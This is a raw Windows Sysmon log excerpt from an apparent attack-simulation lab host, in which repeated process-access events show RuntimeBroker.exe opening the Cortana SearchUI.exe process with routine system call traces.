13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
